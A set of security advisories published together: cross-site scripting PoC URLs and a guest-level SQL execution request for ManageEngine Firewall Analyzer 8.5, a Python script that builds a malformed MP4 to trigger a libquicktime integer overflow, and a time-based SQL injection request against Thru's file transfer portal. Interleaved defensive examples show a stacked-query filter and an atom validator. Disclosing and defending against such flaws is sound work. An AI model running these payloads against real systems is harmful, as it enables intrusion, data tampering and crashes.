#########################################################
================================================================
ManageEngine Firewall Analyzer 8.5– Multiple Cross-Site Scripting
Vulnerability
================================================================
Description :
Vulnerability Type : Multiple Cross Site Scripting Vulnerability
Vulnerable Version : 8.5
Vendor Homepage: https://www.manageengine.com/products/firewall/download.html
CVE-ID :
Severity : High
Author – Sachin Wagh (@tiger_tigerboy)
ManageEngine Firewall Analyzer is an agentless log analytics and
configuration management software that helps network administrators to
centrally collect, archive, analyze their security device logs and generate
forensic reports out of it.
ManageEngine Firewall Analyzer is prone to multiple cross-site scripting
vulnerabilities because it fails to sanitize user-supplied input. An
attacker may leverage these issues to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.
Proof of Concept URL
-----------------------------------------------------------------------------------------------------------------------------------
1. http://localhost:8500/ResolveDNSConfig.nms?f4efe"><script>alert(1)</script>2b1254aa403=1
2. http://localhost:8500/addDevCrd.nms?cba2d"><script>alert(1)</script>99328e18e3f=1
3. http://localhost:8500/customizeReportAction.nms?flushAll=true&17eab"><script>alert(1)</script>d1bf001d67b=1
4. http://localhost:8500/userIPConfig.nms?fe1b5"><script>alert(1)</script>62ff05628d3=1
5. http://localhost:8500/viewListPageAction.nms?3078c"><script>alert(1)</script>fea0d816dfe=1
6. http://localhost:8500/createAnomaly.nms?dc8c4%22%3E%3Cscript%3Ealert%281%29%3C/script%3E0c840168f94=1
7. http://localhost:8500/createProfile.do?66342"><script>alert(1)</script>7cdd43cf7ed=1
8. http://localhost:8500/fw/ResolveDNSConfig.nms?dnsOption=1&dnsMemorySize=10000&dnsUpdate=&dnsResult=&6adac%22%3E%3Cscript%3Ealert%281%29%3C/script%3E619a9b8bff2d28708=1
9. http://localhost:8500/fw/index2.do?url=advSrchAction&tab=search&sMode=adv&subTab=advSrch&3602d%22%3E%3Cscript%3Ealert%281%29%3C/script%3E4bb604792b5eb3ace=1&DateRange=&flushCache=&additionalParams=sMode%3dadv%26subTab%3dadvSrch%26tab%3dsearch%26url%3dadvSrchAction&functionName=&to=2016-01-15+00%3a00+++2016-01-15+12%3a35&uniqueReport=null
10. http://localhost:8500/searchAction.do?fd272%22%3E%3Cscript%3Ealert%281%29%3C/script%3Eace8dfca87a=1
11. http://localhost:8500/uniquereport.do?baseUrl=uniquereport&resourceName=SimulatedFirewall1&displayName=SimulatedFirewall1&reportId=1&resourceType=Firewall&divid=Firewall_1&divType=block&applyTimeCriteria=true&7db2f%22%3E%3Cscript%3Ealert%281%29%3C/script%3E8d3926f45f8=1
#########################################################
================================================================
ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability
================================================================
Description :
Vulnerability Type : ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability
Vulnerable Version : 8.5
Vendor Homepage: https://www.manageengine.com/products/firewall/download.html
CVE-ID :
Severity : High
Author – Sachin Wagh (@tiger_tigerboy)
ManageEngine Firewall Analyzer is an agentless log analytics and configuration management software that helps network administrators to centrally collect,
archive, analyze their security device logs and generate forensic reports out of it.
The vulnerability exists due to an error in the RunQuery command. An authenticated, remote attacker could exploit
this vulnerability via a crafted POST request. An exploit could allow the attacker to execute arbitrary SQL queries on the underlying database server.
Every user has the ability to execute SQL queries through the "/fw/runQuery.do" script, including the default "guest" user.
Below is the POST request, executed as "guest":
POST /fw/runQuery.do HTTP/1.1
Host: localhost:8500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8500/fw/runQuery.do
Cookie: username=guest; password=8094789293; leftPanel=230px; JSESSIONID=3590F06EA06BBA9B0FC9A40405E1144F; JSESSIONIDSSO=96016151FC34CD1EA17192C6AF288A14; FWA_TABLE=TS
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
execute=true&DatabaseType=postgres&query=select version()
Queries starting with "INSERT" or "UPDATE" are rejected with the warning "operation not permitted".
However, a query such as "SELECT 1;INSERT INTO ..." does not trigger any warning when executed.
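Why a check on the start of the input misses the stacked query described above, as an added example (not ManageEngine's code): a prefix filter next to one that splits the input into statements first. The function names, the simplified SQL lexer and the sample queries are assumptions of this example.

```python
import re


def prefix_filter(query):
    """Flawed pattern from the advisory: only the start of the input is inspected."""
    head = query.lstrip().upper()
    return not head.startswith(("INSERT", "UPDATE"))


def split_statements(query):
    """Split on ';' outside quotes and comments (simplified lexer, no dollar quoting)."""
    statements, buf, i, n = [], [], 0, len(query)
    while i < n:
        ch, two = query[i], query[i:i + 2]
        if ch in ("'", '"'):                      # string literal or quoted identifier
            j = i + 1
            while j < n:
                if query[j] == ch:
                    if query[j + 1:j + 2] == ch:  # doubled quote is an escaped quote
                        j += 2
                        continue
                    break
                j += 1
            buf.append(query[i:j + 1])
            i = j + 1
        elif two == "--":                         # line comment: skip to end of line
            end = query.find("\n", i)
            i = n if end == -1 else end
        elif two == "/*":                         # block comment: replace by a space
            end = query.find("*/", i + 2)
            i = n if end == -1 else end + 2
            buf.append(" ")
        elif ch == ";":                           # statement terminator
            statements.append("".join(buf).strip())
            buf = []
            i += 1
        else:
            buf.append(ch)
            i += 1
    statements.append("".join(buf).strip())
    return [s for s in statements if s]


def statement_filter(query):
    """Accept exactly one statement, and only if its first keyword is SELECT."""
    statements = split_statements(query)
    if len(statements) != 1:
        return False
    first = re.match(r"[A-Za-z_]+", statements[0])
    return bool(first) and first.group(0).upper() == "SELECT"


# Constructed sample queries (table name is a placeholder).
SAMPLES = [
    "select version()",
    "INSERT INTO t VALUES (1)",
    "SELECT 1;INSERT INTO t VALUES (1)",
    "SELECT ';' AS semi;",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(repr(q), prefix_filter(q), statement_filter(q))
```

A statement filter is defence in depth only, since a `SELECT` can still call functions with side effects; the query console should also connect with a database role limited to read access.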
Affected Product:
------------------------------------------------------------------------------------------------------------
Vulnerable Product:
[+] ManageEngine Firewall Analyzer 8.5
Credits & Authors
-------------------------------------------------------------------------------------------------------------
Sachin Wagh (@tiger_tigerboy)
#!/usr/bin/env python
#
###
# - 7 February 2016 -
# My last bug hunting session (*for fun and no-profit*)
# has been dedicated to libquicktime
###
#
# Author: Marco Romano - @nemux_ http://www.nemux.org
# libquicktime 1.2.4 Integer Overflow
#
# Product Page: http://libquicktime.sourceforge.net/
# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
# Affected products: All products using libquicktime version <= 1.2.4
#
# CVE-ID: CVE-2016-2399
#
# Disclosure part: http://www.nemux.org
#
########
####### Timeline
#
# 07 Feb 2016 Bug discovered
# 17 Feb 2016 Mitre.org contacted
# 17 Feb 2016 Disclosed to the project's maintainer
# 23 Feb 2016 No response from the maintainer
# 23 Feb 2016 Publicly disclosed
#
########
####### References
#
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
# http://libquicktime.sourceforge.net/
# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html
# https://en.wikipedia.org/wiki/QuickTime_File_Format
#
#######
#
# DISCLAIMER: It's just a PoC... it will crash something
#
####
import sys
import struct
import binascii
"""
There needs to be an mp4 file with these nested atoms to trigger the bug:
moov -> trak -> mdia -> hdlr
"""
hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1"
"6D6F6F76" #### moov atom
"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000"
"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000"
"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000"
"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF"
"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
"7472616B" #### trak atom
"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
"6D646961" #### mdia atom
"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
"4E" #### hdlr atom length
"68646C72" #### hdlr atom
"0000000000"
"4141414141414141" #### our airstrip :)
"0000000000000000000000"
"EC" #### 236 > 127 <-- overflow here and a change in signedness too
"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")
hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))
def createPoC():
    # Write the assembled atoms to ./nemux.mp4
    try:
        with open("./nemux.mp4", "wb") as output:
            output.write(hax0r_mp4)
        print("[*] The PoC is done!")
    except Exception as e:
        print(str(e))
        print("[*] mmmm!")
def usage():
    print("\nUsage? Run it -> " + sys.argv[0])
    print("this poc creates an mp4 file named nemux.mp4")
    print("--------------------------------------------")
    print("This dummy help? " + sys.argv[0] + " help\n")
    sys.exit()
if __name__ == "__main__":
    try:
        if len(sys.argv) == 2:
            usage()
        else:
            print("\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n")
            print("Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n")
            createPoC()
    except Exception as e:
        print(str(e))
        print("Ok... Something went wrong...")
        sys.exit()
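The PoC above marks the byte `EC` (236 > 127) in the `hdlr` atom. As an added example, not code from libquicktime or from the PoC author, this validator walks moov -> trak -> mdia -> hdlr and flags a name length byte that exceeds the bytes left in the atom. The 24-byte fixed `hdlr` header layout, the helper names and the two sample files built inline are assumptions of this example.

```python
import struct

CONTAINERS = {b"moov", b"trak", b"mdia"}  # atoms whose payload is a list of atoms
HDLR_FIXED = 24  # version/flags, type, subtype, manufacturer, flags, flags mask


def walk_atoms(buf, start=0, end=None, path=()):
    """Yield (path, payload_start, payload_end) for each atom, depth first.

    Simplification: 64-bit (size == 1) and to-end-of-file (size == 0) atoms
    are rejected rather than parsed.
    """
    end = len(buf) if end is None else end
    pos = start
    while pos + 8 <= end:
        size, kind = struct.unpack_from(">I4s", buf, pos)
        if size < 8 or pos + size > end:
            raise ValueError("atom %r at offset %d has bad size %d" % (kind, pos, size))
        here = path + (kind,)
        yield here, pos + 8, pos + size
        if kind in CONTAINERS:
            yield from walk_atoms(buf, pos + 8, pos + size, here)
        pos += size


def check_hdlr_names(buf):
    """Return (path, message) for every hdlr whose name length byte is unsafe."""
    findings = []
    for path, lo, hi in walk_atoms(buf):
        if path[-1] != b"hdlr":
            continue
        if hi - lo < HDLR_FIXED + 1:
            findings.append((path, "hdlr too short to hold a name length byte"))
            continue
        unsigned = buf[lo + HDLR_FIXED]                    # value 0..255
        signed = struct.unpack("b", bytes([unsigned]))[0]  # same byte as signed char
        room = hi - (lo + HDLR_FIXED + 1)                  # bytes left in the atom
        if unsigned > room:
            findings.append((path, "name length %d (%d as signed char) > %d bytes left"
                             % (unsigned, signed, room)))
    return findings


# Constructed sample input (not the PoC file from the page).
def atom(kind, payload):
    return struct.pack(">I4s", 8 + len(payload), kind) + payload


def hdlr(length_byte, name):
    return atom(b"hdlr", bytes(HDLR_FIXED) + bytes([length_byte]) + name)


def wrap(inner):
    return atom(b"moov", atom(b"trak", atom(b"mdia", inner)))


GOOD = wrap(hdlr(5, b"Sound"))
BAD = wrap(hdlr(0xEC, b"aaa"))  # same length byte value as the page's PoC

if __name__ == "__main__":
    for label, sample in (("good", GOOD), ("bad", BAD)):
        print(label, check_hdlr_names(sample))
```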
Advisory ID: SYSS-2015-056
Product: Thru Managed File Transfer Portal
Manufacturer: Thru
Affected Version(s): 9.0.2
Tested Version(s): 9.0.2
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2015-10-28
Solution Date: 2016-01-22
Public Disclosure: 2016-02-15
CVE Reference: Not yet assigned
Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher
(SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Thru Managed File Transfer Portal is a web based file transfer application.
According to the Thru website [1], the application aims to offload large
file transfer to a single platform, to protect files, to replace FTP
servers and to allow access to files anytime, anywhere.
An SQL injection vulnerability was identified in one of the GET requests.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SQL injection vulnerability was found in a GET request that causes
contact data to be sorted. At least the attribute values of sortorder
and letterrange are not correctly sanitized and therefore can be abused
to inject arbitrary SQL statements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP request can be used to show that the SQL statement
causing a delay is executed and results in a 500 server error:
GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
Host: [HOST]
Cookie: [COOKIES]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The reported security vulnerability has been fixed in a new software
release. Update to the new software version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-10-27: Vulnerability discovered
2015-10-28: Vulnerability reported to manufacturer
2016-01-22: Manufacturer announced update
2016-02-15: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Thru Homepage
http://www.thruinc.com
[2] SySS Security Advisory SYSS-2015-056
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Dr. Erlijn van Genuchten and
Danny Österreicher of the SySS GmbH.
E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
E-Mail: danny.oesterreicher@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
Key ID: 0x96029AC7
Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en